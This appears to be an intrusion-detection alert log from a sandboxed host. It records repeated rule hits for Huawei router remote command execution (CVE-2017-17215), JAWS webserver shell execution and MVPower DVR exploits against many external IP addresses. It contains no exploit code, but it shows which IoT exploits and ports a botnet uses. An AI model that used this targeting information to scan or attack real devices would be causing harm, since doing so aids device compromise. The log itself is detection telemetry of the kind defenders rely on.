                            06/10/24-15:38:00.208229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886437215192.168.2.13156.181.42.38
                            06/10/24-15:38:02.236059TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5612280192.168.2.1332.84.255.187
                            06/10/24-15:38:00.240544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3952637215192.168.2.13156.14.175.34
                            06/10/24-15:38:02.926997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242437215192.168.2.13197.184.123.16
                            06/10/24-15:38:02.127508TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3603480192.168.2.13179.134.3.40
                            06/10/24-15:37:59.979940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536237215192.168.2.1341.117.93.142
                            06/10/24-15:38:00.271532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5104837215192.168.2.1341.136.101.104
                            06/10/24-15:38:02.137618TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5706480192.168.2.1393.149.221.237
                            06/10/24-15:38:02.238179TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5111680192.168.2.13204.127.150.87
                            06/10/24-15:38:02.823755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966637215192.168.2.13156.35.194.89
                            06/10/24-15:38:02.156095TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3527280192.168.2.1319.229.67.74
                            06/10/24-15:38:02.180786TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3451680192.168.2.1370.179.238.108
                            06/10/24-15:38:00.134301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544037215192.168.2.13197.110.124.70
                            06/10/24-15:38:02.672216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873037215192.168.2.13197.176.219.219
                            06/10/24-15:38:02.758344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398237215192.168.2.13197.200.122.252
                            06/10/24-15:37:59.928827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568237215192.168.2.1341.117.101.224
                            06/10/24-15:38:02.854671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076037215192.168.2.1341.101.217.26
                            06/10/24-15:38:00.274773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3467837215192.168.2.1341.14.173.139
                            06/10/24-15:38:00.272286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3853837215192.168.2.1341.71.37.130
                            06/10/24-15:38:02.172142TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5318480192.168.2.1364.124.149.6
                            06/10/24-15:37:59.968007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816037215192.168.2.13197.119.156.133
                            06/10/24-15:37:59.750933TCP2025883ET EXPLOIT MVPower DVR Shell UCE3567480192.168.2.13151.218.172.48
                            06/10/24-15:38:02.647206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907037215192.168.2.13156.230.86.20
                            06/10/24-15:37:59.985167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5781837215192.168.2.13156.159.10.140
                            06/10/24-15:38:00.263818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573637215192.168.2.1341.207.144.176
                            06/10/24-15:38:02.707896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219037215192.168.2.13156.122.95.109
                            06/10/24-15:38:00.132023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4329237215192.168.2.1341.102.185.160
                            06/10/24-15:38:02.135826TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4542480192.168.2.13117.64.201.48
                            06/10/24-15:37:59.992906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339437215192.168.2.13156.168.136.24
                            06/10/24-15:38:02.814855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3514037215192.168.2.13197.255.67.237
                            06/10/24-15:38:00.191721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840637215192.168.2.1341.226.55.109
                            06/10/24-15:38:00.016307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050237215192.168.2.13156.176.31.94
                            06/10/24-15:38:02.500887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3405037215192.168.2.13156.155.61.239
                            06/10/24-15:38:02.651590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4509637215192.168.2.13197.64.191.165
                            06/10/24-15:38:00.260853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494037215192.168.2.13197.195.196.75
                            06/10/24-15:38:00.166755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463237215192.168.2.1341.79.189.48
                            06/10/24-15:38:02.877070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463037215192.168.2.13197.158.23.49
                            06/10/24-15:37:59.967169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660237215192.168.2.13197.230.194.3
                            06/10/24-15:38:00.235344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186837215192.168.2.13197.27.124.211
                            06/10/24-15:38:00.022039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4804637215192.168.2.13197.167.77.113
                            06/10/24-15:38:00.028419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299637215192.168.2.13197.211.105.203
                            06/10/24-15:38:02.181988TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3973680192.168.2.1362.45.198.223
                            06/10/24-15:37:59.926044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443637215192.168.2.13156.190.41.183
                            06/10/24-15:38:02.793700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433637215192.168.2.13197.253.198.195
                            06/10/24-15:37:59.966319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178837215192.168.2.13197.234.232.228
                            06/10/24-15:38:02.495900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456637215192.168.2.13156.84.42.33
                            06/10/24-15:38:02.195818TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4554280192.168.2.1366.229.246.168
                            06/10/24-15:38:02.911966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388037215192.168.2.1341.213.29.197
                            06/10/24-15:38:00.017007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197237215192.168.2.13156.163.189.151
                            06/10/24-15:38:02.503623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660837215192.168.2.13156.212.201.147
                            06/10/24-15:38:02.762083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939237215192.168.2.13156.167.31.0
                            06/10/24-15:37:59.935900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850837215192.168.2.13156.67.226.82
                            06/10/24-15:38:00.259448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867237215192.168.2.13197.171.135.28
                            06/10/24-15:37:59.929860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379637215192.168.2.13156.205.253.53
                            06/10/24-15:38:02.094682TCP2025883ET EXPLOIT MVPower DVR Shell UCE4115680192.168.2.13116.139.9.42
                            06/10/24-15:38:02.705525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964437215192.168.2.1341.150.3.195
                            06/10/24-15:38:00.023435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5678637215192.168.2.13197.59.140.99
                            06/10/24-15:38:00.248014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456637215192.168.2.13156.132.214.203
                            06/10/24-15:38:02.719824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750237215192.168.2.1341.180.76.156
                            06/10/24-15:37:59.962047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611437215192.168.2.13156.237.170.76
                            06/10/24-15:38:00.164438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885037215192.168.2.13156.202.215.189
                            06/10/24-15:38:00.226767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388837215192.168.2.13197.22.241.36
                            06/10/24-15:38:02.084446TCP2025883ET EXPLOIT MVPower DVR Shell UCE4370080192.168.2.138.145.15.147
                            06/10/24-15:38:02.709297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370837215192.168.2.1341.0.196.5
                            06/10/24-15:38:02.745716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560437215192.168.2.13197.100.179.179
                            06/10/24-15:38:02.857260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5220637215192.168.2.1341.31.52.172
                            06/10/24-15:38:02.128991TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4450480192.168.2.13190.161.182.142
                            06/10/24-15:38:02.731556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496037215192.168.2.13156.86.244.31
                            06/10/24-15:38:02.751686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388437215192.168.2.13197.255.245.2
                            06/10/24-15:38:02.734955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733837215192.168.2.13156.126.41.40
                            06/10/24-15:38:02.648657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4428437215192.168.2.1341.231.143.228
                            06/10/24-15:38:02.664556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246837215192.168.2.13197.210.141.62
                            06/10/24-15:38:00.224097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709437215192.168.2.13156.137.31.90
                            06/10/24-15:38:02.810751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374037215192.168.2.13156.100.123.7
                            06/10/24-15:37:59.979091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515637215192.168.2.13197.37.79.4
                            06/10/24-15:38:02.615090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287237215192.168.2.1341.51.65.173
                            06/10/24-15:38:02.200766TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5520680192.168.2.1339.154.202.115
                            06/10/24-15:38:02.252788TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4436880192.168.2.13202.69.204.2
                            06/10/24-15:38:02.102548TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4140680192.168.2.13147.119.198.29
                            06/10/24-15:38:02.219305TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3306680192.168.2.13109.50.38.173
                            06/10/24-15:38:02.907506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160237215192.168.2.13156.230.96.138
                            06/10/24-15:37:59.991203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286037215192.168.2.13156.29.235.89
                            06/10/24-15:38:00.205893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661037215192.168.2.13197.128.46.215
                            06/10/24-15:38:02.241705TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5028280192.168.2.1378.97.49.13
                            06/10/24-15:38:00.268090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913237215192.168.2.13156.196.209.129
                            06/10/24-15:38:02.488949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3891037215192.168.2.1341.194.53.246
                            06/10/24-15:38:02.161714TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5078880192.168.2.13110.144.244.193
                            06/10/24-15:37:59.984293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266837215192.168.2.13156.197.209.223
                            06/10/24-15:37:59.863643TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4323280192.168.2.1380.234.35.77
                            06/10/24-15:37:59.852064TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4599480192.168.2.13120.127.248.215
                            06/10/24-15:38:02.150981TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4221480192.168.2.13105.229.187.237
                            06/10/24-15:38:02.107053TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4963480192.168.2.1337.113.221.65
                            06/10/24-15:38:02.189189TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5459080192.168.2.13181.43.113.5
                            06/10/24-15:38:02.649435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4450437215192.168.2.1341.61.237.24
                            06/10/24-15:38:00.211497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4592237215192.168.2.13156.25.179.14
                            06/10/24-15:38:02.739622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865037215192.168.2.13156.58.2.142
                            06/10/24-15:38:02.781625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932237215192.168.2.13156.207.139.16
                            06/10/24-15:37:59.833827TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5149280192.168.2.13154.68.192.29
                            06/10/24-15:38:02.914938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981837215192.168.2.13197.246.148.60
                            06/10/24-15:38:02.688716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232037215192.168.2.13197.58.68.31
                            06/10/24-15:37:59.769858TCP2025883ET EXPLOIT MVPower DVR Shell UCE3933880192.168.2.13193.5.227.125
                            06/10/24-15:38:00.165713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652237215192.168.2.1341.139.140.243
                            06/10/24-15:38:02.765712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4273237215192.168.2.1341.182.157.126
                            06/10/24-15:37:59.774510TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5412880192.168.2.13115.56.153.54
                            06/10/24-15:38:02.261737TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3299080192.168.2.13181.122.54.158
                            06/10/24-15:38:02.177787TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5438680192.168.2.13186.93.20.106
                            06/10/24-15:38:02.791154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479237215192.168.2.1341.189.9.139
                            06/10/24-15:38:00.233672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990437215192.168.2.13197.114.103.51
                            06/10/24-15:38:00.187605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680637215192.168.2.13197.214.46.200
                            06/10/24-15:38:00.178071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407837215192.168.2.1341.69.149.120
                            06/10/24-15:38:02.500162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327037215192.168.2.13156.241.169.48
                            06/10/24-15:38:02.683936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985437215192.168.2.13156.19.238.181
                            06/10/24-15:38:02.925765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5582037215192.168.2.13156.189.36.162
                            06/10/24-15:38:02.868091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097237215192.168.2.13197.16.236.173
                            06/10/24-15:38:02.225181TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5145480192.168.2.13202.253.242.169
                            06/10/24-15:37:59.758232TCP2025883ET EXPLOIT MVPower DVR Shell UCE4343480192.168.2.1357.244.132.164
                            06/10/24-15:38:02.650837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204437215192.168.2.13197.254.128.168
                            06/10/24-15:38:02.645712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4326237215192.168.2.1341.98.155.71
                            06/10/24-15:38:02.655152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812637215192.168.2.1341.138.83.212
                            06/10/24-15:38:00.266123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737037215192.168.2.1341.129.146.218
                            06/10/24-15:38:00.210637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021037215192.168.2.13156.62.210.214
                            06/10/24-15:38:00.222372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707437215192.168.2.1341.9.164.177
                            06/10/24-15:38:02.932450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340637215192.168.2.13156.179.20.17
                            06/10/24-15:38:02.847965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643637215192.168.2.13156.234.121.196
                            06/10/24-15:38:02.185648TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3883880192.168.2.1351.241.250.184
                            06/10/24-15:38:00.002137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440237215192.168.2.1341.63.241.27
                            06/10/24-15:37:59.962891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5813837215192.168.2.13156.59.177.15
                            06/10/24-15:38:02.921767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795037215192.168.2.1341.78.178.23
                            06/10/24-15:37:59.862278TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4359080192.168.2.13200.227.24.116
                            06/10/24-15:38:02.096206TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3551680192.168.2.13118.208.232.79
                            06/10/24-15:38:02.151592TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4256680192.168.2.1361.33.199.230
                            06/10/24-15:38:02.843717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019437215192.168.2.13156.3.211.244
                            06/10/24-15:38:02.116834TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3724280192.168.2.1390.50.216.33
                            06/10/24-15:38:02.878023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926437215192.168.2.13197.15.80.136
                            06/10/24-15:38:02.637710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030637215192.168.2.13156.0.208.206
                            06/10/24-15:37:59.824955TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4806880192.168.2.13189.244.26.215
                            06/10/24-15:38:00.021324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5156237215192.168.2.1341.130.180.46
                            06/10/24-15:38:02.674620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489037215192.168.2.13197.224.191.228
                            06/10/24-15:38:00.208966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207437215192.168.2.13156.250.0.84
                            06/10/24-15:38:02.869779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820437215192.168.2.13197.36.79.49
                            06/10/24-15:38:02.255540TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3648280192.168.2.13103.129.186.135
                            06/10/24-15:38:00.199727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505837215192.168.2.1341.251.58.239
                            06/10/24-15:38:00.039932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845637215192.168.2.13156.139.95.100
                            06/10/24-15:38:02.229242TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5611880192.168.2.1353.171.149.247
                            06/10/24-15:38:00.274014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970637215192.168.2.13156.154.82.234
                            06/10/24-15:37:59.980839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542037215192.168.2.13197.64.121.194
                            06/10/24-15:38:00.002985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3441237215192.168.2.13156.156.74.74
                            06/10/24-15:38:02.254862TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3710880192.168.2.1335.202.251.10
                            06/10/24-15:37:59.945412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5376837215192.168.2.13156.31.27.232
                            06/10/24-15:38:02.691059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324437215192.168.2.13156.140.104.46
                            06/10/24-15:38:02.730340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400837215192.168.2.13156.36.1.67
                            06/10/24-15:37:59.974792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474037215192.168.2.1341.38.164.93
                            06/10/24-15:38:02.660067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6088237215192.168.2.1341.178.84.39
                            06/10/24-15:37:59.949732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910037215192.168.2.13156.216.173.116
                            06/10/24-15:38:00.183026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352837215192.168.2.1341.9.80.183
                            06/10/24-15:38:02.695812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265037215192.168.2.13197.231.249.66
                            06/10/24-15:38:02.706858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5402237215192.168.2.13156.142.125.129
                            06/10/24-15:38:00.262299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779637215192.168.2.13197.194.180.37
                            06/10/24-15:38:02.502931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624037215192.168.2.1341.185.155.40
                            06/10/24-15:38:00.175015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656837215192.168.2.13197.123.247.90
                            06/10/24-15:38:00.168829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6010237215192.168.2.13197.140.21.238
                            06/10/24-15:37:59.952158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885037215192.168.2.1341.119.93.57
                            06/10/24-15:38:00.179072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014837215192.168.2.13156.179.233.113
                            06/10/24-15:38:02.245859TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5683280192.168.2.1327.226.253.249
                            06/10/24-15:38:00.037044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3378637215192.168.2.13156.179.78.181
                            06/10/24-15:38:02.788817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628437215192.168.2.13156.174.49.82
                            06/10/24-15:37:59.930930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3283437215192.168.2.13156.249.70.243
                            06/10/24-15:38:00.273128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202637215192.168.2.13197.128.86.63
                            06/10/24-15:38:02.840962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819837215192.168.2.13156.94.92.161
                            06/10/24-15:38:02.168603TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4901080192.168.2.13181.110.113.163
                            06/10/24-15:38:02.669182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613237215192.168.2.13197.46.18.42
                            06/10/24-15:38:02.641973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777437215192.168.2.13197.167.195.153
                            06/10/24-15:38:02.685061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140437215192.168.2.1341.164.51.0
                            06/10/24-15:37:59.955351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629437215192.168.2.1341.12.156.197
                            06/10/24-15:38:02.853487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709837215192.168.2.13156.201.215.148
                            06/10/24-15:37:59.990322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719637215192.168.2.1341.89.132.28
                            06/10/24-15:38:02.802976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560637215192.168.2.13156.104.41.78
                            06/10/24-15:38:02.153497TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4292480192.168.2.13120.43.7.228
                            06/10/24-15:38:02.786162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221637215192.168.2.13156.193.153.44
                            06/10/24-15:38:02.300493TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5457880192.168.2.13176.236.149.84
                            06/10/24-15:38:02.654413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411037215192.168.2.13197.149.108.206
                            06/10/24-15:37:59.838365TCP2025883ET EXPLOIT MVPower DVR Shell UCE3421680192.168.2.1339.251.150.235
                            06/10/24-15:38:00.024876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965437215192.168.2.13197.98.178.183
                            06/10/24-15:38:00.238848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642837215192.168.2.13197.11.239.20
                            06/10/24-15:38:02.210410TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6062880192.168.2.13213.195.115.2
                            06/10/24-15:38:00.177056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3980037215192.168.2.13156.160.21.128
                            06/10/24-15:37:59.760581TCP2025883ET EXPLOIT MVPower DVR Shell UCE3587280192.168.2.13194.55.24.22
                            06/10/24-15:37:59.813573TCP2025883ET EXPLOIT MVPower DVR Shell UCE5562080192.168.2.1346.11.146.222
                            06/10/24-15:38:00.231962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985837215192.168.2.13156.36.86.237
                            06/10/24-15:38:02.807666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165437215192.168.2.13156.114.253.89
                            06/10/24-15:38:02.165801TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5060080192.168.2.13201.158.211.234
                            06/10/24-15:38:02.763209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4393037215192.168.2.1341.218.218.29
                            06/10/24-15:38:02.715141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671237215192.168.2.13197.57.43.253
                            06/10/24-15:38:02.093773TCP2025883ET EXPLOIT MVPower DVR Shell UCE4892880192.168.2.13205.225.173.196
                            06/10/24-15:38:02.138778TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3942680192.168.2.13104.230.30.200
                            06/10/24-15:38:02.142395TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4357480192.168.2.1337.115.220.96
                            06/10/24-15:37:59.818135TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4019480192.168.2.13111.31.234.213
                            06/10/24-15:38:02.218757TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4749680192.168.2.13147.24.1.119
